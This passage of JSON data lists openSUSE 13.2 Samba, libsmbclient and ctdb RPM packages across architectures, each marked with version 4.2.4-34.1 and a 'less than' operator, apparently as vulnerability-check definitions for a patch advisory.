"libgensec-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-python-4.2.4-34.1.i586.rpm", "packageName": "samba-python", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr-standard0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libndr-standard0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libtevent-util0-4.2.4-34.1.x86_64.rpm", "packageName": "libtevent-util0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-policy0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libsamba-policy0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-policy0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-policy0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbclient0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libsmbclient0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "ctdb-devel-4.2.4-34.1.i586.rpm", "packageName": "ctdb-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "ctdb-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "ctdb-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-hostconfig0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-hostconfig0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-libs-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "samba-libs-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbclient0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbclient0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-util-devel-4.2.4-34.1.i586.rpm", "packageName": "libsamba-util-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libtevent-util0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libtevent-util0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-credentials-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-credentials-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "ctdb-tests-4.2.4-34.1.i586.rpm", "packageName": "ctdb-tests", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-binding0-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-binding0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-client-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "samba-client-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr-nbt0-4.2.4-34.1.i586.rpm", "packageName": "libndr-nbt0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc-atsvc0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc-atsvc0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbldap0-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbldap0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-passdb-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-passdb-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-credentials-devel-4.2.4-34.1.i586.rpm", "packageName": "libsamba-credentials-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libndr0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-client-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "samba-client-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libwbclient0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libwbclient0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-debugsource-4.2.4-34.1.i586.rpm", "packageName": "samba-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbconf0-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbconf0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbldap0-4.2.4-34.1.i586.rpm", "packageName": "libsmbldap0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbclient-raw0-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbclient-raw0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libtevent-util-devel-4.2.4-34.1.i586.rpm", "packageName": "libtevent-util-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbclient-raw0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbclient-raw0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libndr0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-krb5pac-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-krb5pac-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libtevent-util0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libtevent-util0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-samr0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-samr0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr-devel-4.2.4-34.1.i586.rpm", "packageName": "libndr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libregistry0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libregistry0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-pidl-4.2.4-34.1.x86_64.rpm", "packageName": "samba-pidl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbclient0-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbclient0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamdb0-4.2.4-34.1.i586.rpm", "packageName": "libsamdb0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbclient-raw0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbclient-raw0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libwbclient-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libwbclient-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-util0-4.2.4-34.1.i586.rpm", "packageName": "libsamba-util0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-nbt-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-nbt-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc-samr0-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc-samr0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-4.2.4-34.1.x86_64.rpm", "packageName": "samba", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-passdb0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libsamba-passdb0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libtevent-util0-4.2.4-34.1.i586.rpm", "packageName": "libtevent-util0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbconf0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbconf0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libnetapi-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libnetapi-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-python-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "samba-python-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-winbind-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "samba-winbind-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-credentials0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-credentials0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr-krb5pac0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libndr-krb5pac0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr0-4.2.4-34.1.i586.rpm", "packageName": "libndr0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libtevent-util-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libtevent-util-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-krb5pac0-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-krb5pac0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbconf-devel-4.2.4-34.1.i586.rpm", "packageName": "libsmbconf-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc0-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-credentials0-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-credentials0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbldap0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbldap0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbclient-raw-devel-4.2.4-34.1.i586.rpm", "packageName": "libsmbclient-raw-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-hostconfig-devel-4.2.4-34.1.i586.rpm", "packageName": "libsamba-hostconfig-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbclient-raw-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbclient-raw-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbclient0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbclient0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-winbind-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "samba-winbind-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libnetapi0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libnetapi0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-samr0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-samr0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-atsvc0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-atsvc0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-standard0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-standard0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbldap-devel-4.2.4-34.1.i586.rpm", "packageName": "libsmbldap-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-passdb0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-passdb0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-winbind-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "samba-winbind-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-hostconfig0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-hostconfig0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-krb5pac0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-krb5pac0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-test-4.2.4-34.1.x86_64.rpm", "packageName": "samba-test", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libgensec0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libgensec0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbconf0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbconf0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libndr0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-passdb0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-passdb0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr-standard-devel-4.2.4-34.1.i586.rpm", "packageName": "libndr-standard-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-hostconfig0-4.2.4-34.1.i586.rpm", "packageName": "libsamba-hostconfig0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamdb0-4.2.4-34.1.x86_64.rpm", "packageName": "libsamdb0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libgensec-devel-4.2.4-34.1.i586.rpm", "packageName": "libgensec-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libgensec0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libgensec0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr-krb5pac-devel-4.2.4-34.1.i586.rpm", "packageName": "libndr-krb5pac-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamdb0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libsamdb0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-standard0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-standard0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libregistry0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libregistry0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libregistry0-4.2.4-34.1.x86_64.rpm", "packageName": "libregistry0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbclient-raw0-4.2.4-34.1.i586.rpm", "packageName": "libsmbclient-raw0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-passdb0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-passdb0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-atsvc0-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-atsvc0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-libs-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "samba-libs-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libwbclient0-4.2.4-34.1.x86_64.rpm", "packageName": "libwbclient0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-python-4.2.4-34.1.x86_64.rpm", "packageName": "samba-python", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-binding0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-binding0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libtevent-util0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libtevent-util0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-nbt0-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-nbt0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbclient0-4.2.4-34.1.i586.rpm", "packageName": "libsmbclient0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libregistry0-4.2.4-34.1.i586.rpm", "packageName": "libregistry0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libnetapi0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libnetapi0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-client-4.2.4-34.1.i586.rpm", "packageName": "samba-client", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamdb0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamdb0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-util0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-util0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-libs-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "samba-libs-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "noarch", "packageFilename": "samba-doc-4.2.4-34.1.noarch.rpm", "packageName": "samba-doc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-util0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-util0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-test-devel-4.2.4-34.1.x86_64.rpm", "packageName": "samba-test-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr-nbt0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libndr-nbt0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-policy-devel-4.2.4-34.1.i586.rpm", "packageName": "libsamba-policy-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "ctdb-tests-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "ctdb-tests-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libndr0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "ctdb-pcp-pmda-4.2.4-34.1.x86_64.rpm", "packageName": "ctdb-pcp-pmda", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-atsvc0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-atsvc0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-core-devel-4.2.4-34.1.i586.rpm", "packageName": "samba-core-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-passdb0-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-passdb0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "ctdb-4.2.4-34.1.x86_64.rpm", "packageName": "ctdb", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-krb5pac0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-krb5pac0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-standard0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-standard0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libwbclient0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libwbclient0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-util0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libsamba-util0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-hostconfig0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-hostconfig0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": 